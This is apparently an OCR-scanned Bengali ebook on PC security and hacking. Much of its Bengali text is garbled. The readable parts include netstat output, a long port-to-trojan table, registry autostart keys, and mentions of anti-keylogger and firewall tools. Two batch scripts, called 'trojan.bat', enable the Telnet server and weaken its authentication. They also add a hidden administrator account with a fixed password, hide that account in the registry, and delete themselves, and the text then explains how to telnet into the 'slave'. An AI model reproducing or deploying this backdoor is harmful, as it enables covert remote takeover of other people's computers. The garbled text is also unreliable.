TCP 

192.168.52.174:53593 

chanproxy-13-01-snc7: 

https ESTABLISHED 


TCP 

192.168.52.174:53770 

relayl:https 

ESTABLISHED 



TCP 

192.168.52.174:53771 

relayl:https 

ESTABLISHED 



TCP 

192.168.52.174:53814 

Meramex46x86:icslap 

TIME WAIT 



TCP 

192.168.52.174:53815 

Admin-PC:icslap 

TIME WAIT 



TCP 

192.168.52.174:53819 

sin01s04-in-f15:https 

TIME WAIT 



TCP 

192.168.52.174:53820 

sin01s05-in-f18:https 

TIME WAIT 



TCP 

192.168.52.174:53821 

sin01s05-in-f18:https 

TIME WAIT 



TCP 

192.168.52.174:53823 

sin01s05-in-f18:http 

ESTABLISHED 



TCP 

192.168.52.174:53824 

tm:http 

ESTABLISHED 



TCP 

192.168.52.174:53825 

sitecheck2:http 

TIME WAIT 



TCP 

192.168.52.174:53826 

tm:http 

ESTABLISHED 



TCP 

192.168.52.174:53828 

tm:http 

ESTABLISHED 



TCP 

192.168.52.174:53829 

tm:http 

ESTABLISHED 



TCP 

192.168.52.174:53830 

tm:http 

ESTABLISHED 



TCP 

192.168.52.174:53831 

tm:http 

ESTABLISHED 



TCP 

192.168.52.174:53832 

tm:http 

ESTABLISHED 



TCP 

192.168.52.174:53833 

*:http 

ESTABLISHED 



TCP 

192.168.52.174:53834 

tm:http 

ESTABLISHED 



TCP 

192.168.52.174:53839 

sin01s04-in-f15:https 

ESTABLISHED 



TCP 

192.168.52.174:53840 

sin01s04-in-f15:https 

ESTABLISHED 



TCP 

192.168.52.174:53842 

8.19.18.191:http 

ESTABLISHED 




| 8) Local Address aw to spf at% arm vsrw ’:’ a^ ftow aw or wx*irr www v3frft sew ^ wiwwaw aw cwpm | 

cafl? I tow tto - wy awt?r tww? ef\3?n ^ikw i cwwkw alfilbvs ww (St^tw yrr <wrw cwrw cat& wrstw wiw vstw towwr wwr sots i v3wt®t | 
I otf wrawrw CMD otf ara to aw wrcw twto cw 1 to csott cwrw cart tor ots vsrser tow tow wvs wiw wfwrw wwiw ato a 
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c*n& 

Q?T'3iH S3 

l(UDP) 

Sockets desTroie 

2 

Death 

20 

Senna Spy FTP server 

21 

Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, Fore, 

Invisible FTP, J uggernaut 42, Larva, M otlv FTP, Net Administrator, Ramen, Senna Spy FTP server, The 
Flu, Traitor 21, WebEx, WinCrash 

22 

Shaft 

23 

Fire HacKer, Tiny Telnet Server - TTS, Truva Atl 

25 

Ajan, Antigen, Barok, Email Password Sender - EPS, EPS II, Gip, Gris, Happy99, Hpteam mail, Hybris, 1 
love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan), Moscow Email trojan, Naebi, NewApt 
worm, ProM ail trojan, Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy 

30 

Agent 40421 

31 

Agent 31, Hackers Paradise, Masters Paradise 

41 

Deep Throat, Foreplay 

48 

DRAT 

50 

DRAT 

58 

DM Setup 

59 

DM Setup 

79 

CDK, Firehotcker 

80 

711 trojan (Seven Eleven), AckCmd, Back End, Back Orifice 2000 Plug-Ins, Cafeini, CGI Backdoor, 
Executor, God Message, God Message Creator, Hooker, IlSworm, MTX, NCX, Reverse WWW Tunnel 
Backdoor, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader 

81 

RemoConChubo 

99 

Hidden Port, NCX 

110 

ProM ail trojan 

113 

Invisible Identd Deamon, Kazimas 

119 

Happy99 

121 

Attack Bot, God M essage, JammerKillah 


^nf%° f¥p Pkvjw ~ 3 w \ ^fiifi <p?iisi 
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123 

Net Controller 

133 

Farnaz 

137 

Chode 

137 (UDP) 

Msinit 

138 

Chode 

139 

Chode, God Message worm, Msinit, Netlog, Network, Qaz 

142 

NetTaxi 

146 

Inferior 

146 (UDP) 

Inferior 

170 

A-trojan 

334 

Backage 

411 

Backage 

420 

Breach, Incognito 

451 

TCP Wrappers trojan 

455 

Fatal Connections 

456 

Hackers Paradise 

513 

Hackers Paradise 

555 

RPC Backdoor 

605 

Net666, Rasmin 

666 

711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy 

667 

Secret Service 

669 

Attack FTP, Back Construction, BLA trojan, Cain & Abel, NokNok, Satans Back Door - SBD, ServU, 
Shadow Phyre, th3rlpp3rz (=Therippers) 

692 

Snipe rNet 

777 

DP trojan 

808 

GayOL 


srfe f*r^jr v^o^fi ^[vs ^fiifi ^ry 
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911 

AimSpy, Undetected 

999 

WinHole 

1000 

Dark Shadow 

1001 

Deep Throat, Foreplay, WinSatan 

1010 

DerSpaher / DerSpaeher, Direct Connection 

1011 

Der Spaher / Der Spaeher, Le Guardien, Silencer, WebEx 

1012 

Doly Trojan 

1015 

Doly Trojan 

1016 

Doly Trojan 

1020 

Doly Trojan 

1024 

Doly Trojan 

1025 

Vampire 

1025 (UDP) 

Jade, Latinus, NetSpy 

1035 

Remote Storm 

1042 

Remote Storm 

1045 

Multidropper 

1049 

BLA trojan 

1050 

Rasmin 

1053 

/sbin/initd 

1054 

MiniCommand 

1080 

The Thief 

1081 

AckCmd 

1082 

WinHole 

1083 

WinHole 

1090 

WinHole 


^yrf%° f¥p Pkvjw ^w\ <p$\$ 
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1095 

WinHole 

1097 

Xtreme 

1098 

Remote Administration Tool - RAT 

1099 

Remote Administration Tool - RAT 

1150 

Remote Administration Tool - RAT 

1151 

Blood Fest Evolution, Remote Administration Tool - RAT 

1170 

Orion 

1200 (UDP) 

Orion 

1201 (UDP) 

Psyber Stream Server - PSS, Streaming Audio Server, Voice 

1207 

NoBackO 

1208 

NoBackO 

1212 

SoftWAR 

1234 

Inferior 

1243 

Kaos 

1245 

SubSeven Java client, Ultors Trojan 

1255 

BackDoor-G, SubSeven, SubSeven Apocalypse, Tiles 

1256 

VooDoo Doll 

1269 

Scarab 

1272 

Project nEXT 

1313 

Matrix 

1338 

The M atrix 

1349 

The M atrix 

1394 

Millenium Worm 

1441 

Bo dll 

1492 

GoFriller, Backdoor G-l 


^yrf%° f¥p Pio&tw* ~3w\ ^fiifi <p$\$ 
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1524 

Remote Storm 

1568 

FTP99CM P 

1600 

Trinoo 

1703 

Remote Hack 

1777 

Direct Connection, Shivka-Burka 

1807 

Exploiter 

1966 

Scarab 

1967 

SpySender 

1969 

Fake FTP 

1981 

WM FTP Server 

1999 

OpC BO 

2000 

£Bowl,Shockrave 

2001 

Back Door, SubSeven, TransScout 

2023 

Der Spaher / Der Spaeher, Insane Network, Last 2000, Remote Explorer 2000, Senna Spy Trojan 
Generator 

2080 

Der Spaher / Der Spaeher, Trojan Cow 

2115 

Ripper Pro 

2130(UDP) 

WinHole 

2140 

Bugs 

2140(UDP) 

Mini Backlash 

2155 

TheInvasor 

2255 

Deep Throat,Foreplay 

2283 

Illusion Mailer 

2300 

Nirvana 

2311 

HvIRAT 

2330 

Xplorer 


^iR>° f¥p ~3W\ ^fiifi ^[vs ^fiifi 
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2331 

Studio 54 

2332 

Contact 

2333 

Contact 

2334 

Contact 

2335 

Contact 

2336 

Contact 

2337 

Contact 

2338 

Contact 

2339 

Contact, Voice Spy 

2339(UDP) 

Contact 

2345 

Contact, Voice Spy 

2565 

Voice Spy 

2583 

Doly Trojan 

2600 

Striker trojan 

2716 

W inCrash 

2773 

Digital RootBeer 

2774 

The Prayer 

2801 

SubSeven, SubSeven 2.1 Gold 

2989(UDP) 

SubSeven, SubSeven 2.1 Gold 

3000 

Phineas Phucker 

3024 

Phineas Phucker 

3031 

Remote Shut 

3128 

W inCrash 

3129 

M icrospy 

3150 

Reverse WWW Tunnel Backdoor, RingZero 


^yrf%° f¥p Pkvjw ~3w\ ^fiifi <p$\$ 
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3150(UDP) 

Masters Paradise 

3456 

TheInvasor 

3459 

Deep Throat,Foreplay,Mini Backlash 

3700 

Terror trojan 

3777 

Eclipse 2000,Sanctuary 

3791 

Portal of Doom 

3801 

PsychWard 

4000 

Total Solar Edypse 

4092 

Total Solar Edypse 

4242 

SkyDance 

4321 

W inCrash 

4444 

Virtual Hacking Machine -VHM 

4567 

BoBo 

4590 

Prosiak, Swift Remote 

4950 

File Nail 

5000 

ICQ Trojan 

5001 

ICQ Trogen (Lm) 

5002 

Back Door Setup, Blazer5, Bubbel, ICKiller, Raid, Sockets desTroie 

5010 

Back Door Setup, Sockets desTroie 

5011 

cdOOr, Shaft 

5025 

Solo 

5031 

One of the Last Trojans - OOTLT, One of the Last Trojans - OOTLT, modified 

5032 

WM Remote KeyLogger 

5321 

Net Metropolitan 

5333 

Net Metropolitan 


^yrf%° f¥p Pkvjw ^w\ <p$\$ 
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5343 

Firehotcker 

5400 

Backage, NetDemon 

5401 

wCrat - WC Remote Administration Tool 

5402 

Back Construction, Blade Runner 

5512 

Back Construction, Blade Runner 

5534 

Back Construction, Blade Runner 

5550 

Illusion Mailer 

5555 

Xtcp 

5556 

ServeMe 

5557 

BO Facil 

5569 

BO Facil 

5637 

Robo - Hack 

5638 

PC Crasher 

5742 

PC Crasher 

5760 

W inCrash 

5880 

Portmap Remote Root Linux Exploit 

5882 

Y3KRAT 

5882 

Y3KRAT 

5882 (UDP) 

Y3KRAT 

5888 

Y3KRAT 

5889 

Y3KRAT 

5889 

Y3KRAT 

6000 

The Thing 

6000 

Bad Blood 

6000 

Secret Service 


^yrf%° f¥p Pkvjw ^w\ <p$\$ 
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6000 

The Thing 

6661 

TEMan, Weia-Meia 

6666 

Dark Connection Inside, NetBusworm 

6667 

Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8, Trinity, WinSatan 

6669 

Host Control, Vampire 

6670 

BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame 

6711 

BackDoor-G, SubSeven, VP Killer 

6710 

Funny trojan, SubSeven 

6713 

SubSeven 

6723 

M stream 

6771 

Deep Throat, Foreplay 

6776 

2000 Cracks, BackDoor-G, SubSeven, VP Killer 

6838 (UDP) 

M stream 

6883 

Delta Source DarkStar (??) 

6912 

Shit Heep 

6939 

Indoctrination 

6969 

GateCrasher, IRC 3, Net Controller, Priority 

6970 

GateCrasher 

7000 

Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold 

7001 

Freak88, Freak2k 

7215 

SubSeven, SubSeven 2.1 Gold 

7300 

NetMonitor 

7301 

NetMonitor 

7306 

NetMonitor 

7307 

NetMonitor 
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7308 

NetMonitor 

7424 

Host Control 

7424 (UDP) 

Host Control 

7597 

Qaz 

7626 

Glacier 

7777 

God Message,Tini 

7789 

Back Door Setup, ICKiller 

7891 

The ReVeNgEr 

7983 

M stream 

8080 

Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor, RingZero 

8787 

Back Orifice 2000 

8988 

BacHack 

8989 

Rcon, Recon, Xcon 

9000 

Netministrator 

9325 (UDP) 

M stream 

9400 

InCommand 

9872 

Portal of Doom 

9873 

Portal of Doom 

9874 

Portal of Doom 

9875 

Portal of Doom 

9876 

Cyber Attacker, Rux 

9878 

TransScout 

9989 

Ini-Killer 

9999 

The Prayer 

10000 

OpwinTRojan 
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10005 

OpwinTRojan 

10067 

(UDP) 

OpwinTRojan 

10085 

Syphillis 

10086 

Syphillis 

10100 

Control Total, Gift trojan 

10101 

BrainSpy, Silencer 

10167 

(UDP) 

Portal of Doom 

10520 

Acid Shivers 

10528 

Host Control 

10607 

Coma 

10666 

(UDP) 

Ambush 

11000 

Senna Spy Trojan Generator 

11050 

Host Control 

11051 

Host Control 

11223 

Progenic trojan, Secret Agent 

12076 

Gjamer 

12345 

Hack'99 KeyLogger 

12346 

Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp dient.c, icmp pipe.c, Mypic, NetBus, NetBus 
Toy, NetBus worm, Pie Bill Gates, Whackjob, X-bill 

12349 

Fat Bitch trojan, GabanBus, NetBus, X-bill 

12361 

BioNet 

12362 

Whack-a-mole 

12363 

Whack-a-mole 

12623 

Whack-a-mole 
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(UDP) 


12624 

DUN Control 

12631 

ButtM an 

12754 

Whackjob 

13000 

M stream 

13010 

Senna Spy Trojan Generator, Senna Spy Trojan Generator 

13013 

Hacker Brasil - HBR 

13014 

PsychWard 

13223 

PsychWard 

13473 

Hack'99 KeyLogger 

14500 

Chupacabra 

14501 

PC Invader 

14502 

PC Invader 

14503 

PC Invader 

15000 

PC Invader 

15092 

NetDemon 

15104 

Host Control 

15382 

M stream 

15858 

SubZero 

16484 

CDK 

16660 

Mosucker 

16772 

Sracheldraht 

16959 

ICQ Revenge 

16969 

SubSeven, Subseven 2.1.4 DefCon 8 

17166 

Priority 
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17300 

Mosaic 

17449 

Kuang2 the virus 

17500 

Kid Terror 

17569 

CrazzyNet 

17593 

CrazzyNet 

17777 

Inferior 

18753 

(UDP) 

Audiodoor 

19864 

Nephron 

20000 

ICQ Revenge 

20001 

Millenium 

20002 

Millenium, Millenium (Lm) 

20005 

AcidkoR 

20023 

Mosucker 

20034 

NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whackjob 

20203 

Chupacabra 

20331 

BLA trojan 

20432 

Shaft 

20433 

(UDP) 

Shaft 

21544 

GirlFriend, Kid Terror 

21554 

Exploiter, Kid Terror, Schwindler, WinspOOfer 

22222 

Donald Dick, Prosiak, Ruler, RUXTheTIc.K 

23005 

NetTrash 

23006 

NetTrash 

23023 

Logged 
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23030 

Amanda 

23432 

Asylum 

23456 

Evil FTP, Ugly FTP, Whackjob 

23476 

Donald Dick 

23476 

(UDP) 

Donald Dick 

23477 

Donald Dick 

23777 

InetSpy 

24000 

Inferior 

25685 

Moonpie 

25686 

Moonpie 

25982 

Moonpie 

26274 

(UDP) 

Delta Source 

26681 

Voice Spy 

27374 

Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven M uie, 
Ttfloader 

27444 

(UDP) 

Trinoo 

27573 

SubSeven 

27665 

Trinoo 

28678 

Exploiter 

29104 

NetTrojan 

29363 

ovasOn 

29891 

The Unexplained 

30000 

Inferior 

30001 

ErrOr32 
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30003 

Lamers Death 

30029 

AOL trojan 

30100 

NetSphere 

30101 

NetSphere 

30102 

NetSphere 

30103 

NetSphere 

30103 

(UDP) 

NetSphere 

30133 

NetSphere 

30303 

Sockets desTroie 

30947 

Intruse 

30999 

Trinoo 

31335 

Bo Whack, Butt Funnel 

31336 

Back Fire, Back Orifice 1.20 patches, Back Orifice (Lm), Back Orifice russian, Baron Night, Beeone, BO 
client, BO Facil, BO spy, B02, cron / crontab, Freak88, Freak2k, icmp pipe.c, Sockdmini 

31337 

Back Orifice, Deep BO 

31337 

(UDP) 

Back Orifice, Butt Funnel, NetSpy (DK) 

31338 

BOWhack 

31338 

(UDP) 

Hack a Tack 

31787 

Hack a Tack 

31788 

Hack a Tack 

31789 

(UDP) 

Hack a Tack 

31790 

Hack a Tack 

31791 

(UDP) 

Hack a Tack 
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31792 

Hack a Tack 

32001 

Donald Dick 

32100 

Peanut Brittle, Project nEXT 

32418 

Acid Battery 

33270 

Trinity 

33333 

Blakharaz, Prosiak 

33577 

Son of PsychWard 

33777 

Son of PsychWard 

33911 

Spirit 2000, Spirit 2001 

34324 

Big Gluck, TN 

34444 

Donald Dick 

34555 

(UDP) 

Trinoo (for Windows) 

35555 

(UDP) 

Trinoo (for Windows) 

37237 

Mantis 

37651 

Yet Another Trojan - YAT 

40412 

The Spy 

40421 

Agent 40421, M asters Paradise 

40422 

Masters Paradise 

40423 

Masters Paradise 

40425 

Masters Paradise 

40426 

Masters Paradise 

41337 

Storm 

41666 

Remote Boot Tool - RBT, Remote Boot Tool - RBT 

44444 

Prosiak 
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44575 

Exploiter 

47262 

(UDP) 

Delta Source 

49301 

OnLine KeyLogger 

50130 

Enterprise 

50505 

Sockes desTroie 

50766 

Fore, Schwindler 

51966 

Cafeini 

52317 

Acid Battery 

53001 

Remote Windows Shutdown - RWS 

54283 

SubSeven, SubSeven 2.1 Gold 

54320 

Back Orifice 2000 

54321 

Back Orifice 2000, School Bus 

55165 

File Manager trojan, File Manager trojan, WM Trojan Generator 

55166 

WM Trojan Generator 

57341 

NetRaider 

58339 

Butt Funnel 

60000 

Deep Throat, Foreplay, Sockets desTroie 

60001 

Trinity 

60068 

Xzip 6000068 

60411 

Connection 

61348 

Bunker - Hill 

61466 

TeleCom mando 

61603 

Bunker - Hill 

63485 

Bunker - Hill 

64101 

Taskman 
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65000 

Devil, Sockets desTroie, Stacheldraht 

65390 

f 

Edypse 

65421 

1 

1 

Jade 

65432 

1 

| 

The Traitor (=th3tr41t0r) 

65432 

(UDP) 

| 

The Traitor (=th3tr41t0r) 

65534 

1 

1 

/sbin/initd 

65535 

1 

RC1 trojan 

I 1 ' 



8) am tarn aw w my a^r acmrc'fi m area PID wiw i atr stw Process ID I ca cait &r faw caw catw cait mw a?y 
PID m a^?p i am Windows Task Manager m a^r a^x Services tw It (ns ^ a^r f%m f&m aya I arcaw 

Hitfi'Cvs cam PID a<r aw fafm ca*p am aia 3 a<y aaw [ description ] I aw St taw cam wrfam area' faw m afa w fafm 
aifa orrafa (S'i^ym wiifm © 


^yif%° f*r^a faww aaa a>aw ^rcaw aaTw w 
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Name 

PID 

Description 

osppsvc 

6064 

Office Software Protection Platftj ^ 

WSearch 

3243 

Windows Search 

upnphost 

2156 

UPnP Device Flost 

SSDPSRV 

2156 

SSDP Discovery 

FontCache 

2156 

Windows Font Cache Service 

SysMain 

1696 

Superfetch 

StiSvc 

1676 

Windows Image Acquisition (WI7 

LicC triService 

1616 

LicCtrl Service 

AdobeARMservice 

1560 

Adobe Acrobat Update Service 

MpsSvc 

1476 

Windows Firewall 

DPS 

1476 

Diagnostic Policy Service 

BFE 

1476 

Base Filtering Engine 

Spooler 

1428 

Print Spooler 

TapiSrv 

1268 

Telephony 

NlaSvc 

1268 

Network Location Awareness 

LanmanWorkstation 

1268 

Workstation 

< 1 rrr 

1 

► 


CPU Usage: 0% 


Phys-ical Memory: 65 % 


wtv 3 or# cs##? iR m ^rr\3 ri<r c£rr w&m f#r or# i ^ <5 rr ^ auto - startup otftt R#vd i ortf^ 
' 3 r s i«T w $ 3 \\3 \ 3 gr w : w i or# rRtR? gw ^ (Wvs rr«t rr cwt cststr #t? ott jr wr i 3# 
(.fifoR? gs (?Rv 3 fr vsrr ^rrf h#& g*w Regedit Rr^t 3#^ fr^t 1 or# Rrf or&t ^r iR #R%f% Rw RRr 1 or 5 # -*jR 
r orfw, vstw aiv3i4fE IwSfii css gw Trojan.exe ^r trojan.exe riw gtr chtstr orr Rrt i ^nwr 


(W <pflCv 3 FR wWR 
RK« afl^T SIT'pT ®13iK STTaqg I 

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] 

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] 

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] 




b) oil'll srfpra ^‘•histf -sniFbeiRfii^ 

}) sm1% ’’'nt'SW 
o) 3mf% PbPr \3?HTW 
8) isfefS- It^rm 

4 ) -oijivb s < t“lfl 

o) ” 5 iTPr it^ora 


^Y#° f¥j«T RrW <RTf oR®TR <r><q|<q 3 RT «R 
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I R>*IW <Sl3iH I 

1 I 

! ! 

| orrPr 5 J 5 Wi 3to cSrsiH ^mtcrt Prto fto i 3<y wy ^ 3tr Catos' i 

I | 

| $$'MjT>si a5[pr 3?r wr cSmH 4Hiio 5pr notepad am 4 <j«t j<r orto Pns?r ms Sr 4pr 4?p 3 <r (wm ^rpr Pt?r .bat JsrtSmw Pww | 
| PTo 4<p I 

I I 

I I 

I @echo off I 

I | 

I sc config tlntsvr start=auto | 

\ sc start tlntsvr | 

| tlntadmn config sec=-NTLM | 

| tlntadmn config mode=stream | 

| net user tunerpage/add | 

| net user tunerpage 12345 | 

| net localgroup administrators tunerpage /add | 

| reg /add HKEY_LOCAL_MACfflNE\SOFTWARE\Microsoft\Windows j 

| NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DW0RD /d 00 | 

| del trojan.bat | 

I I 

1 ^ 1 

I 3W (W (&W 3 I 

I c ii?®i St c 2 w to < \% ftw i 

1 1 

I «tt$®t Sr atoifi ^trterr a?y ^ w fxeS^ cf wr Telnet server (¥ to i I 

I I 

I \2>?r tor St fneS^ current windows NT systems a?y Telnet server cf to wr i I 

1 1 

18 af *rit^ St aW' 3 ?n^ .a?r NTLM hash security 14 <rar 4 t?r pit<r i 

I 45T St Telnet server 34 stream mode 4314 <s nwr ’JW 4 tti4 i 

T T 

| v3 s^r «tt$®t ^tSt tunerpage ^tor?r tef?r arosto 12345 I 

w «n^®r It tunerpage mm SS'tfi'dto Administrator tor?r to i 
| w tor It tunerpage aa^r ttoa a?y wi ^tSt ^fto i 
| so^r «TTt®r It ^fii ^yfS to c-^ c i(. < i i 

L _ _ . _ , . „ ! 

| Stol^ S 3° (vb^lfl SPRy (SrSTT°T <H®iKvs Pl(.b?l C^TvS - Si <Kfl (®rtayTv5T 3 C^Pt 3^° =TPT ltl?T .bat 3$lCb t ^IM folta C^Tvs <l>fj^l I I 

I I 

\ @echo off \ 

| pkgmgr/iu:“TelnetClient” I 

| pkgmgr /iu:“TelnetServer” | 

| sc config tlntsvr start=auto | 

| sc start tlntsvr \ 

| tlntadmn config sec=-NTLM | 

| tlntadmn config mode=stream | 

| net user tunerpage /add | 

| net user tunerpage 12345 | 

| net localgroup administrators tunerpage /add | 

| reg /add HKEY_LOCAL_MACfflNE\SOFTWARE\Microsoft\Windows \ 

I NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DWORD /d 00 I 

i i 

1 „ I 

5t?r (5 tft cStw IS a Rc- 5YC4 4t^ ps^tpt Telnet Client sim wc4ihi (ait4 Pits^ (41^ wtw 

i i 

| 4H5Bifi a srnw 4ato aram i ^ slave’s IP address sn?m co so srm srft pr pp# 4m 5t4 ^ 

I I 

i i 

I C:\>telnet<slave’s IP address> l 

I I 

| st^t : Sr ^ srrt^r w i^tr i jSr (wm *iwt *nt^ q 

| ^Pr , ,a$ mi?r ^rt i oinf% 4wrw ^t»r 3Sr 4 ?tio fpt w ^ fro 

| 4fK4<H I OPTTC4 (4HolW^ 4WT ^ «TT ^ 


^yrf%° fr^r ^w\ <p$\$ ^fy ^ 
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| (fllbl^jb R*T Pk^ R^llflvs ^C'llb^l I oTPTT ^ffT ^TFMTWT °Tv^T f*R{v!F 


f*r^jr IPc^u^ ~3W\ ^fiifi orc^w ^P) <p$\$ ^ 


P/W/W/W/W/W/W/W/W/M/W/W/W/W/W/M/W/W/W/W^^ 











Up 


www.BanglaEbookDownload.com | 


^ 8 : , f^rer <34x ot : t%v9t RPb\s4fi«r i 

* 

^TTf4° ^44774 bi®^ 5 or[4 4it bi<^ 9 ^prPr ^rrf%° <K44 or[4 4fl <K44 , 1447437 01744774 44 f444 otk^t RPbvs ^ficvs 374 i } 



l 

l 

<3I?T (4lbl4 fb 3pf sp' fw ($174 x3&T44v3t <34T?T (bfl$4 gfflRhvs 4\!>Y (4 oh c 1I$«1 <3 (4vSj ^ C<M®HPi«H boo % f^T^T^TF <34° Wpf (474*51:^1 <1^1^ f%4 , f 

p 

; 4174 14^47 SJI<K4 ! 4474 ^ (474 47 (474 ^%aT SJI4W I R 5 ^ \!>T4 4774" <3?" 47 (4 (4©" ^ >jfl(4v3 4T ! 4T4T41 <34|> (4474 47474^ <34° | 

o]|4*IT<?l4 Hvs'^vsl oJ 4444 4474 oTPTft *j4 44(3^ <?T (W 44744 oT4T4I'Na 3 <34^ f^T^T^W ^Tf4 4<J4 (4(47(41 WITT (4T4Tf44T 447(3 «4f I orrf4 f 
oTf^T ^1TW» f473T4 gf\ 2 )fP$| W fWf(4 <3(4<Kfl f#{v9 4(4 \g4T\s 474744 FT 4TT47(4 f4Wf4\s ol|(4b41 444 '§ 



TJjTvst 44 <•$ tW43T ^44744 I b) o 1V1|34 fWlsT *) 01441^4 f44TW 


b) ^44^4 f44T43T 


27^(4? voJHfll oj|(. c llb4l 444 ; 4441?4’ 144144 f47?T ©4^TK4T ^4774 ^4 c 1l?®i <34 f44T44 RPbvs 44T 474 I 4T°4T (S’ 4474 4S74 <3474 447 oTf74 ” | 
f4W4 (W (?# (4 4TW44 474 3l%T4T4 4447 (474474 414 ” 47f%^ <34 £4743 4lf%44 f4\ 47 I H(<f 144 457 44 474 447S 47 x 344 474 | 
fW t4P^T <34 144744 f$4 ^74 447 I 44444 474 474744' o744l$4 <34 4|S(4 44747 f44T4 44744 47 I oTFI4TT4 , <34 <34 <34 , (44^4 | 
<35J74W OUTS' 474x3 oJT4T4 o7T4474 f47^4 (4 3TT4 447S 444 I Sit 44444 14474374 447 6 t 47474 474744 I oT44lt4 1447437 <S oTR4T o7R47b4T | 
444 f4o774 o7T4f4 St4T4 , (£SW , # 4474 , ?j£ f%£ ts#i (474 4TSTS 414744 I | 
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p ft - piff : p 

\ I 

I I 

ft - ^TT?r frsiw sprt omf% ft- ft snw i 3$p tt ft ($\£ 3?r aPsfS c^ff cf iw ^r 3 ^^ I 

| i 

1 ^ ft - *ipfc (^ 1 I 

I I 

^ I 

ft c^ff &vmifi ft ^ *rr vsft fw ff^T ^ c 9 ^ orftt ft ciw ^ “KeyScrambler" I KeyScrambler 

| ^flf o^v3 3THIF3 3^X vbTSHWTvb 3^ %3T | 


t ft (ns ^ O 5 ^ vsUFTT 

| 

1 1 


sm 1 % ft- *r 5 r[?r 5 ^: NextGen AntiKeylogger I NextGen AntiKeylogger ft os <f?tc« fl<F <F<p \ 


I WF3?ITW C 9 ^ <llbCvs ! I 

I I 

1 _ | 

| wrx 3 ?m^ c 9 ^ ffevs ncf fpt ^ Malwarebytes ’ Anti-Malware I 3 $r ww vsptt omf% 3 frr | 

| m^FT Pnfsr cw WTv3?mw ^ ^ m ^ \st ^ 1 Malwarebytes Corporation 3 <t telW 3 $ ^mf% wrv3?mw v3?mw | 

sp^Ttf olTW\3 vb'iMCvs 3 ^° vblS^iC'llvb <Pfl (.\3 ^PTf% olMvs ^TK^T 33 " ^(f Pl^FT C 9 !^ I (FT^TFT C 9 ^ oTFTpT ft , C3T , f%=T | 

| vetsPt vbTS'H'MTvb ^ <wifi ^tt^t i Malwarebytes’ Anti-Malware 3 ^ orfffwr v 3 WHi$S 3 cw 3 ^ vbiS'HWvb fw^ | 
I 3t Pm i | 


I :j pT?nW\3?rFT ^?FT ! | 

1 I 

p c^Pra^r (srot (pr^n m ^prar 3 <t ^rrl^ite ^Pr ^f?r i 3^ ^rw fw ^rr ^pw f 

| ^ITOt C 9 ^ W* I S$'06W 3<T WT^'3?TFT 3PT 3^fl fw I oTRW Cn^TPPT feflTT S$06W 3^ Pm VfFM'3FTFT C^ft | 

| 3 f&r ^rr i ^ fw PiKb'Hi ^w\ ^ oHTv 3 ?n^ cf&T 3 ^ f^pvs COMODO firewall't wr^ c 9 ^ c^t W^ft | 

i COMODO firewall vbl' 5 ®iC c 1 lvb ^flCvs t?M> 3 lU@HLJ_ 


^Ylff° Pr^JT Pk^iC^ ~3W\ ^fllfl oTC^fW ^[v3 ^fllfl ^fT 


P/W/W/W/W/W/W/W/W/M/W/W/W/W/W/M/W/W/W/W^^ 
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I R#TO 3R^ TOTCRfi^ Hf$R (R RTTO ! 

I 1 

1 

1 - _ ^ ^ _ I 

| -*o|^ci 3R° ^TRl(.fl(b° f^F^T (R RTSTFi) 3<Pb|? Wfe oTTR \sT HrR 3Rfe' 5 T 5 TR R>RT I \3FTRFTT^ HjRT 3RRf 5 T*TR Rt^KR TrUcCvypt \ 

| RR C^KR oTCRT I 3I^T v3lWTPf \3# 3R RF^PS RTRTT HlFs RTRIRR TOlfR I vblSRCRKb RRR\3 Hr R?jR 35 I 


I 3R^ 3^#riw HfR cr rtrtrr ourrr crr rtsw : I 

I I 

i i 

I _ . _ I 

Deep Freeze !!! fSr , DeepFreeze tortr HtHt cr Ri&qft tortw riRc^ w ! 3frr HtHt 3R ^QRmto RRfRTORR £tcr fe^r to rtcr i 

I vcta»f\9(\9 rHt rto rh ^hi4tNa9 crtr RfRRvsR rtS tortr rtcrr HrHr c\s t^jr 3frr rr hwR HtHt (\s fR- (Sr to crt m rjtftrt wit 1 
| ^ 'I 

| 3r&t fR<p 3R w 1 DeepFreeze w*^4 tor tofs fS^RTR cro 3R rt£ rti^r 3r to?t Htr ! DeepFreeze rtos Hr Rip | 

I 3t I I 


vsR^RTR (RHr RYRRTR R^R! 

^il(<K ^(fl^Rfl 3 Rn 3R Wf I 

RTRRTR RffR vsT^RR CRpTR I 3Fs TO WI 


3^ ^JRT RR RTfe HFd FTR RF5T1RT \gR R TO vdT 3R3RTR RPbvs $ ! 3$ \gR ^RT ‘ S JRTRR ^TRTl j 

vgR TO3 3Rfr TOTT RTtR ?RRR 3R RTTOTT ^R R^Jff (RplR STRl ! ^RTR (RplR fTOlR 


VMWare Player ^ 3r£t rrt^rtr i VMWare Player r^rr w Hr R<|R 35 Pir 


| RTOR RfRRR RfRTR RT*[R TORTR RTTR (R ! | 

I I 

I # § 

I RFRR RftpT R RT^lf% ^ (5® RR C^^RT PiR RR^T RRpT R 4|5 r , fw RRpT f% RFR R[tPf 3<T W ^TR ( MAC - Media | 

| Access Control) rtotr^ rtrt tw to ^r 3r ! Network Interface Card (NIC) 3?r s^srrr w rw| 

